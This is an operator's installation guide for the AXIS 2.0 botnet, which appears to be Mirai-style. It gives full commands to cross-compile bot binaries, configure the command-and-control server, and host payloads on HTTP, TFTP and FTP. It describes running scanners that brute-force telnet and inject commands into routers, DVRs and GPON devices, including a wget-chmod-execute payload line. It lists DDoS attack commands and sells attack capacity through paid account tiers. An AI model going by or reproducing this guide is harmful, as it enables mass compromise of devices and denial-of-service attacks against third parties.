================================================================================
                    AXIS 2.0 QUICK SETUP GUIDE
              Complete Installation & Configuration Guide
================================================================================

VERSION 2.0 - March 2026
Includes: 16 attack methods, 23 bot scanners, 7 server-side scanners
NEW: JSON Database System (No MySQL Required!)

This guide covers the complete installation of AXIS 2.0 botnet framework.
Follow ALL steps in order for a successful deployment.

================================================================================
TABLE OF CONTENTS
================================================================================

1. Prerequisites & Requirements
2. Dependency Installation
3. Configuration (CRITICAL - Change 0.0.0.0 placeholders)
4. Building All Components
5. Web Server Setup
6. Starting Services
7. Verification & Testing
8. Scanner Setup (7 Go-based extrascanners)
9. Docker Setup (Optional)
10. Systemd Auto-Start (Optional)

================================================================================
SECTION 1: PREREQUISITES & REQUIREMENTS
================================================================================

Minimum Requirements:
- Linux server (Ubuntu 20.04+ / Debian 11+ / CentOS 8+)
- 2GB RAM minimum (4GB recommended for large botnets)
- 20GB disk space
- Root access
- Public IP address
- Open ports: 80, 3777, 3778, 3779, 9555

Recommended:
- 4+ CPU cores
- 8GB RAM
- 50GB SSD
- 1Gbps network connection
- DDoS-protected hosting

================================================================================
SECTION 2: DEPENDENCY INSTALLATION
================================================================================

Step 2.1: Update System
-----------------------
apt update && apt upgrade -y
reboot

Step 2.2: Install Build Dependencies
------------------------------------
apt install -y \
    golang-go \
    gcc \
    g++ \
    make \
    build-essential \
    apache2 \
    tftpd-hpa \
    xinetd \
    vsftpd \
    screen \
    wget \
    curl \
    git \
    net-tools \
    ufw

Step 2.3: Install Cross-Compilers (for multi-arch bot binaries)
---------------------------------------------------------------
apt install -y \
    gcc-arm-linux-gnueabi \
    gcc-arm-linux-gnueabihf \
    gcc-aarch64-linux-gnu \
    gcc-mips-linux-gnu \
    gcc-mipsel-linux-gnu \
    gcc-mips64-linux-gnuabi64 \
    gcc-powerpc-linux-gnu \
    gcc-sparc64-linux-gnu \
    gcc-m68k-linux-gnu \
    gcc-sh4-linux-gnu \
    gcc-arc-linux-gnu

Step 2.4: Install Go Dependencies
---------------------------------
cd /root/AXIS\ 2.0/cnc
go mod init production-cnc
go get github.com/mattn/go-shellwords
cd /root/AXIS\ 2.0

================================================================================
SECTION 3: CONFIGURATION (CRITICAL!)
================================================================================

⚠️ ALL configuration files use 0.0.0.0 as a placeholder.
⚠️ You MUST change these to your server IP before building!

Step 3.1: Get Server IP
-----------------------
SERVER_IP=$(curl -s ifconfig.me)
echo "Your server IP: $SERVER_IP"

Step 3.2: Configure Bot (bot/config.h)
--------------------------------------
cd /root/AXIS\ 2.0/bot

# Change ALL 0.0.0.0 to your server IP
sed -i 's/CNC_ADDR "0.0.0.0"/CNC_ADDR "'$SERVER_IP'"/' config.h
sed -i 's/HTTP_SERVER "0.0.0.0"/HTTP_SERVER "'$SERVER_IP'"/' config.h
sed -i 's/HTTP_SERVER_IP "0.0.0.0"/HTTP_SERVER_IP "'$SERVER_IP'"/' config.h

# Enable features (edit config.h manually or use these commands)
# #define KILLER      // Enable anti-malware killer
# #define SELFREP     // Enable self-replication scanners
# #define WATCHDOG    // Enable watchdog

Step 3.3: Configure Loader (loader/config.h)
--------------------------------------------
cd /root/AXIS\ 2.0/loader
sed -i 's/0.0.0.0/'$SERVER_IP'/g' config.h

Step 3.4: Configure Downloader (dlr/dlr.h)
------------------------------------------
cd /root/AXIS\ 2.0/dlr
sed -i 's/0.0.0.0/'$SERVER_IP'/g' dlr.h

Step 3.5: Configure Bot Table (bot/table.c)
-------------------------------------------
cd /root/AXIS\ 2.0/bot
sed -i 's/0.0.0.0/'$SERVER_IP'/g' table.c

================================================================================
SECTION 4: BUILDING ALL COMPONENTS
================================================================================

Step 4.1: Run Build Script
--------------------------
cd /root/AXIS\ 2.0
chmod +x build.sh
./build.sh

Step 4.2: What Gets Built
-------------------------
The build script compiles:

1. C&C Server (cnc_server) - Go-based command and control
2. Scan Listener (scanListen) - Receives scan results on port 9555
3. 7 Extrascanners (Go-based):
   - telnet-scanner (mass telnet brute-force)
   - 0day-exploit (command injection scanner)
   - realtek-loader (Realtek UPnP exploit)
   - randox86 (Randox86 JSON injection)
   - fiber (Fiber/GPON Boa server exploit)
   - dvr (DVR/CCTV XML injection)
   - zhone (Zhone ONT/OLT ping exploit)
4. Bot Binaries (13 architectures):
   - arm, arm5, arm6, arm7
   - mips, mpsl
   - x86, x86_64
   - ppc, spc
   - m68k, sh4, arc
5. Loader (telnet credential loader)
6. Downloaders (dlr.*) for each architecture

Step 4.3: Verify Build
----------------------
ls -la cnc_server scanListen loader
ls -la extrascanners/telnet-scanner extrascanners/0day-exploit \
       extrascanners/realtek-loader extrascanners/randox86 \
       extrascanners/fiber extrascanners/dvr extrascanners/zhone
ls -la bins/

Step 4.4: JSON Database (Automatic)
-----------------------------------
The JSON database (cnc/database.json) is created automatically on first run!

Default admin credentials:
- Username: admin
- Password: admin123
- Tier: admin (unlimited everything)

⚠️ CHANGE THE DEFAULT PASSWORD IMMEDIATELY AFTER FIRST LOGIN!

================================================================================
SECTION 5: WEB SERVER SETUP
================================================================================

Step 5.1: Configure Apache
--------------------------
systemctl start apache2
systemctl enable apache2

# Create bins directory
mkdir -p /var/www/html/bins
chmod 777 /var/www/html/bins

# Copy binaries
cp /root/AXIS\ 2.0/bins/* /var/www/html/bins/
chmod 644 /var/www/html/bins/*

# Test download
curl -I http://$SERVER_IP/bins/axis.x86_64

Step 5.2: Configure TFTP Server
-------------------------------
mkdir -p /var/lib/tftpboot
chmod 777 /var/lib/tftpboot
cp /root/AXIS\ 2.0/bins/* /var/lib/tftpboot/

# Configure xinetd for TFTP
cat > /etc/xinetd.d/tftp << EOF
service tftp
{
    socket_type     = dgram
    protocol        = udp
    wait            = yes
    user            = root
    server          = /usr/sbin/in.tftpd
    server_args     = -s /var/lib/tftpboot
    disable         = no
    per_source      = 11
    cps             = 100 2
    flags           = IPv4
}
EOF

systemctl restart xinetd
systemctl enable xinetd

Step 5.3: Configure FTP Server (Optional)
-----------------------------------------
mkdir -p /var/ftp
chmod 777 /var/ftp
cp /root/AXIS\ 2.0/bins/* /var/ftp/

# Configure vsftpd
cat > /etc/vsftpd.conf << EOF
listen=YES
listen_ipv6=NO
anonymous_enable=YES
local_enable=NO
write_enable=NO
anon_root=/var/ftp
anon_upload_enable=NO
anon_mkdir_write_enable=NO
xferlog_enable=YES
xferlog_file=/var/log/vsftpd.log
connect_from_port_20=YES
pasv_enable=NO
port_enable=YES
EOF

systemctl restart vsftpd
systemctl enable vsftpd

================================================================================
SECTION 6: STARTING SERVICES
================================================================================

Step 6.1: Start C&C Server
--------------------------
cd /root/AXIS\ 2.0
screen -S cnc -dm ./cnc_server
echo "C&C server started on port 3778 (bots) and 3777 (admin TLS)"

# The database.json file will be created automatically in cnc/ directory

Step 6.2: Start Scan Listener
-----------------------------
screen -S scan -dm ./scanListen
echo "Scan listener started on port 9555"

Step 6.3: Start Loader (when ready)
-----------------------------------
screen -S loader -dm ./loader
# Feed IPs via: echo "1.2.3.4:23 user:pass" > list.txt
# Then: cat list.txt | ./loader

Step 6.4: Verify Services
-------------------------
ps aux | grep -E 'cnc_server|scanListen'
netstat -tulpn | grep -E '3777|3778|3779|9555'

================================================================================
SECTION 7: VERIFICATION & TESTING
================================================================================

Step 7.1: Test Admin Panel Connection
-------------------------------------
# Using OpenSSL (TLS connection)
openssl s_client -connect $SERVER_IP:3777 -quiet

# Login with default credentials:
# Username: admin
# Password: admin123
# ⚠️ CHANGE THIS IMMEDIATELY!

Step 7.2: Test API
------------------
curl http://$SERVER_IP:3779/api/botnet/status

Step 7.3: Test Web Server
-------------------------
wget http://$SERVER_IP/bins/axis.x86_64
ls -la axis.x86_64

Step 7.4: Test Database (JSON)
------------------------------
# View database file
cat cnc/database.json

# View users in database
cat cnc/database.json | grep -A 10 '"users"'

Step 7.5: Test Bot Connection (simulate)
----------------------------------------
echo -e "\x00\x00\x00\x01\x00" | nc $SERVER_IP 3778

================================================================================
SECTION 8: SCANNER SETUP (7 Go-Based Extrascanners)
================================================================================

AXIS 2.0 includes 7 server-side scanners written in Go for mass exploitation.

Step 8.1: Scanner Overview
--------------------------
| Scanner        | Target                  | Method                    | Port |
|----------------|-------------------------|---------------------------|------|
| telnet-scanner | IoT devices             | Telnet brute-force        | 23   |
| 0day-exploit   | Routers                 | Command injection         | 80   |
| realtek-loader | SOHO routers            | Realtek UPnP RCE          | 52869|
| randox86       | Cloud/VPS               | /admin/service/run        | 80   |
| fiber          | GPON/ONT routers        | Boa formTracert           | 80   |
| dvr            | CCTV/DVR cameras        | XML NTP injection         | 80   |
| zhone          | Zhone ONT/OLT           | Ping diagnostic injection | 80   |

Step 8.2: Prepare Target Lists
------------------------------
mkdir -p leaks b4ckdoorarchive/RANDOM.LST

# Download from: https://github.com/illusionsec/DDOS-archive/tree/main/leaks
# Required files:
# - leaks/10.lst (or any .lst file with IPs)
# - leaks/CF-Rules-1.txt (Cloudflare Rules targets)
# - b4ckdoorarchive/RANDOM.LST/realtek.lst (Realtek targets)

# Included target lists:
# - extrascanners/randox86-valid.txt (2047 URLs, pre-loaded)
# - extrascanners/fiber-targets.txt (template)
# - extrascanners/dvr-targets.txt (template)
# - extrascanners/zhone-targets.txt (template)

Step 8.3: Run All Scanners (RECOMMENDED)
----------------------------------------
cd /root/AXIS\ 2.0/extrascanners
./run-all.sh YOUR_SERVER_IP 1000

# Output files:
# - telnet_results.txt
# - 0day_results.txt
# - realtek_results.txt
# - randox86_results.txt
# - fiber_results.txt
# - dvr_results.txt
# - zhone_results.txt

Step 8.4: Run Individual Scanners
---------------------------------
# Telnet Scanner
./extrascanners/telnet-scanner leaks/10.lst 1000

# 0-Day Exploit
./extrascanners/0day-exploit leaks/CF-Rules-1.txt YOUR_SERVER_IP 500

# Realtek Loader
./extrascanners/realtek-loader b4ckdoorarchive/RANDOM.LST/realtek.lst YOUR_SERVER_IP 1000

# Randox86 (2047 pre-loaded targets)
./extrascanners/randox86 randox86-valid.txt "wget http://YOUR_IP/bins/axis.x86;chmod +x /tmp/a;/tmp/a" 500

# Fiber/GPON
./extrascanners/fiber fiber-targets.txt YOUR_SERVER_IP 500

# DVR/CCTV (35 credentials)
./extrascanners/dvr dvr-targets.txt YOUR_SERVER_IP 500

# Zhone ONT/OLT (6 credentials, session key)
./extrascanners/zhone zhone-targets.txt YOUR_SERVER_IP 500

Step 8.5: Feed Results to Loader
--------------------------------
# Feed all results to loader:
cat telnet_results.txt 0day_results.txt realtek_results.txt \
    randox86_results.txt fiber_results.txt dvr_results.txt \
    zhone_results.txt | ./loader

================================================================================
SECTION 9: DOCKER SETUP (OPTIONAL)
================================================================================

Step 9.1: Install Docker
-------------------------
curl -fsSL https://get.docker.com -o get-docker.sh
sh get-docker.sh
systemctl enable docker
systemctl start docker

Step 9.2: Build Docker Image
----------------------------
cd /root/AXIS\ 2.0
docker build -t axis2:latest .
docker run -d -p 80:80 -p 3777:3777 -p 3778:3778 -p 3779:3779 -p 9555:9555 --name axis2 axis2:latest

================================================================================
SECTION 10: SYSTEMD AUTO-START (OPTIONAL)
================================================================================

Step 10.1: Create Services
--------------------------
cat > /etc/systemd/system/axis2-cnc.service << EOF
[Unit]
Description=AXIS 2.0 C&C Server
After=network.target apache2.service

[Service]
Type=simple
User=root
WorkingDirectory=/root/AXIS\ 2.0
ExecStart=/root/AXIS\ 2.0/cnc_server
Restart=always
RestartSec=10
LimitNOFILE=999999

[Install]
WantedBy=multi-user.target
EOF

cat > /etc/systemd/system/axis2-scan.service << EOF
[Unit]
Description=AXIS 2.0 Scan Listener
After=network.target axis2-cnc.service

[Service]
Type=simple
User=root
WorkingDirectory=/root/AXIS\ 2.0
ExecStart=/root/AXIS\ 2.0/scanListen
Restart=always
RestartSec=10
LimitNOFILE=999999

[Install]
WantedBy=multi-user.target
EOF

Step 10.2: Enable Services
--------------------------
systemctl daemon-reload
systemctl enable axis2-cnc axis2-scan
systemctl start axis2-cnc axis2-scan
systemctl status axis2-cnc axis2-scan

================================================================================
FIREWALL CONFIGURATION
================================================================================

ufw default deny incoming
ufw default allow outgoing

# Allow required ports
ufw allow 22/tcp    # SSH
ufw allow 80/tcp    # HTTP (binaries)
ufw allow 3777/tcp  # Admin TLS
ufw allow 3778/tcp  # Bot connections
ufw allow 3779/tcp  # API
ufw allow 9555/tcp  # Scan results
ufw allow 69/udp    # TFTP

ufw enable

================================================================================
SECURITY CHECKLIST
================================================================================

[ ] Changed default admin password (admin123)
[ ] Changed API key (AXIS2-ADMIN-APIKEY)
[ ] Configured firewall (only required ports open)
[ ] Set up fail2ban for SSH
[ ] Enabled automatic security updates
[ ] Set up regular database.json backups
[ ] Set database.json permissions (chmod 600)
[ ] Configured log rotation

================================================================================
COMMON COMMANDS REFERENCE
================================================================================

# Service Management
systemctl status axis2-cnc axis2-scan
systemctl restart axis2-cnc

# Screen Sessions
screen -ls
screen -r cnc
screen -r scan

# View Logs
tail -f logs/commands.txt
tail -f logs/logins.txt
tail -f telnet.txt

# Database Management
cat cnc/database.json                    # View database
cp cnc/database.json cnc/database.bak    # Backup database

# Admin Panel Commands
adduser         # Create user with tier selection
upgradeuser     # Upgrade user tier
listusers       # List all users
deluser         # Remove user

# Bot Management (via admin panel)
.status         # Show bot count
.bots           # List online bots

# Attack Commands (via admin panel)
!udp <ip> <port> <duration>
!tcp <ip> <port> <duration>
!http <url> <duration>
!axis-tcp <ip> <duration> tcpport=80
!axis-udp <ip> <duration> udpport=53
!ultimate-l4 <ip> <duration>
!ultimate-l7 <url> <duration>
!stop           # Stop all attacks

================================================================================
FILE LOCATIONS SUMMARY
================================================================================

Source Code:     /root/AXIS 2.0/
Binaries:        /root/AXIS 2.0/bins/
                 /var/www/html/bins/
                 /var/lib/tftpboot/
                 /var/ftp/

Executables:     /root/AXIS 2.0/cnc_server
                 /root/AXIS 2.0/scanListen
                 /root/AXIS 2.0/loader
                 /root/AXIS 2.0/extrascanners/*

Logs:            /root/AXIS 2.0/logs/commands.txt
                 /root/AXIS 2.0/logs/logins.txt
                 /root/AXIS 2.0/telnet.txt

Configs:         /root/AXIS 2.0/bot/config.h
                 /root/AXIS 2.0/loader/config.h
                 /root/AXIS 2.0/dlr/dlr.h

Database:        cnc/database.json (JSON file-based)
                 Default admin: admin / admin123

================================================================================
ACCOUNT TIERS
================================================================================

| Tier     | Max Duration | Max Bots | Attack Methods                    |
|----------|-------------|----------|-----------------------------------|
| Basic    | 120 seconds | 100      | tcp, udp, icmp, http              |
| Premium  | 180 seconds | 500      | Basic + ovhtcp, ovhudp, dns-amp   |
| VIP      | 600 seconds | Unlimited| Premium + all amp, gre, axis-*    |
| Admin    | Unlimited   | Unlimited| All methods                       |

================================================================================
TROUBLESHOOTING
================================================================================

See TROUBLESHOOTING.txt for detailed troubleshooting guide.

Quick fixes:

# Services not starting
killall cnc_server scanListen
./cnc_server &
./scanListen &

# Database file issues
chmod 600 cnc/database.json
# Restart C&C - will recreate if missing

# Permission issues
chmod 777 /var/www/html/bins/
chmod 777 /var/lib/tftpboot/

# Port conflicts
netstat -tulpn | grep -E '3777|3778|3779|9555'
kill -9 $(lsof -t -i:3778)

# Reset admin password (manual edit)
nano cnc/database.json
# Find "password": "admin123" and change it

================================================================================
END OF QUICK SETUP GUIDE
================================================================================

For more information, see:
- README.md - Full documentation
- TROUBLESHOOTING.txt - Troubleshooting guide
- AXIS-L4_README.md - AXIS-TCP/AXIS-UDP Layer 4 attack documentation
- AXIS-L7_README.md - AXIS-L7 Layer 7 attack documentation
- cnc/JSON_DATABASE_GUIDE.md - Complete JSON database guide

================================================================================
